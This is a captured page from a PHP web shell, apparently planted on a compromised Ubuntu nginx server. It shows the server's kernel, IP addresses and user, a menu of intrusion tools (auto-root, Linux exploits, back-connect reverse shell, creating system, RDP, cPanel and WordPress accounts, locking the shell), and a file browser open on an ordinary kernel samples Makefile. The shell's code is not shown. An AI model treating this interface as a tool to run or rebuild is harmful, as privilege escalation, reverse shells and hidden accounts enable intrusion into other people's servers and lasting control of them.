Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
src /
linux-headers-5.15.0-160 /
samples /
[ HOME SHELL ]
Name
Size
Permission
Action
acrn
[ DIR ]
drwxr-xr-x
auxdisplay
[ DIR ]
drwxr-xr-x
binderfs
[ DIR ]
drwxr-xr-x
bpf
[ DIR ]
drwxr-xr-x
configfs
[ DIR ]
drwxr-xr-x
connector
[ DIR ]
drwxr-xr-x
fanotify
[ DIR ]
drwxr-xr-x
ftrace
[ DIR ]
drwxr-xr-x
hidraw
[ DIR ]
drwxr-xr-x
hw_breakpoint
[ DIR ]
drwxr-xr-x
kdb
[ DIR ]
drwxr-xr-x
kfifo
[ DIR ]
drwxr-xr-x
kmemleak
[ DIR ]
drwxr-xr-x
kobject
[ DIR ]
drwxr-xr-x
kprobes
[ DIR ]
drwxr-xr-x
landlock
[ DIR ]
drwxr-xr-x
livepatch
[ DIR ]
drwxr-xr-x
mei
[ DIR ]
drwxr-xr-x
nitro_enclaves
[ DIR ]
drwxr-xr-x
pidfd
[ DIR ]
drwxr-xr-x
pktgen
[ DIR ]
drwxr-xr-x
qmi
[ DIR ]
drwxr-xr-x
rpmsg
[ DIR ]
drwxr-xr-x
seccomp
[ DIR ]
drwxr-xr-x
timers
[ DIR ]
drwxr-xr-x
trace_events
[ DIR ]
drwxr-xr-x
trace_printk
[ DIR ]
drwxr-xr-x
uhid
[ DIR ]
drwxr-xr-x
v4l
[ DIR ]
drwxr-xr-x
vfio-mdev
[ DIR ]
drwxr-xr-x
vfs
[ DIR ]
drwxr-xr-x
watch_queue
[ DIR ]
drwxr-xr-x
watchdog
[ DIR ]
drwxr-xr-x
Kconfig
7.22
KB
-rw-r--r--
Makefile
1.34
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Makefile
# SPDX-License-Identifier: GPL-2.0 # Makefile for Linux samples code subdir-$(CONFIG_SAMPLE_AUXDISPLAY) += auxdisplay subdir-$(CONFIG_SAMPLE_ANDROID_BINDERFS) += binderfs obj-$(CONFIG_SAMPLE_CONFIGFS) += configfs/ obj-$(CONFIG_SAMPLE_CONNECTOR) += connector/ obj-$(CONFIG_SAMPLE_FANOTIFY_ERROR) += fanotify/ subdir-$(CONFIG_SAMPLE_HIDRAW) += hidraw obj-$(CONFIG_SAMPLE_HW_BREAKPOINT) += hw_breakpoint/ obj-$(CONFIG_SAMPLE_KDB) += kdb/ obj-$(CONFIG_SAMPLE_KFIFO) += kfifo/ obj-$(CONFIG_SAMPLE_KOBJECT) += kobject/ obj-$(CONFIG_SAMPLE_KPROBES) += kprobes/ subdir-$(CONFIG_SAMPLE_LANDLOCK) += landlock obj-$(CONFIG_SAMPLE_LIVEPATCH) += livepatch/ subdir-$(CONFIG_SAMPLE_PIDFD) += pidfd obj-$(CONFIG_SAMPLE_QMI_CLIENT) += qmi/ obj-$(CONFIG_SAMPLE_RPMSG_CLIENT) += rpmsg/ subdir-$(CONFIG_SAMPLE_SECCOMP) += seccomp subdir-$(CONFIG_SAMPLE_TIMER) += timers obj-$(CONFIG_SAMPLE_TRACE_EVENTS) += trace_events/ obj-$(CONFIG_SAMPLE_TRACE_PRINTK) += trace_printk/ obj-$(CONFIG_SAMPLE_FTRACE_DIRECT) += ftrace/ obj-$(CONFIG_SAMPLE_TRACE_ARRAY) += ftrace/ subdir-$(CONFIG_SAMPLE_UHID) += uhid obj-$(CONFIG_VIDEO_PCI_SKELETON) += v4l/ obj-y += vfio-mdev/ subdir-$(CONFIG_SAMPLE_VFS) += vfs obj-$(CONFIG_SAMPLE_INTEL_MEI) += mei/ subdir-$(CONFIG_SAMPLE_WATCHDOG) += watchdog subdir-$(CONFIG_SAMPLE_WATCH_QUEUE) += watch_queue obj-$(CONFIG_DEBUG_KMEMLEAK_TEST) += kmemleak/
Close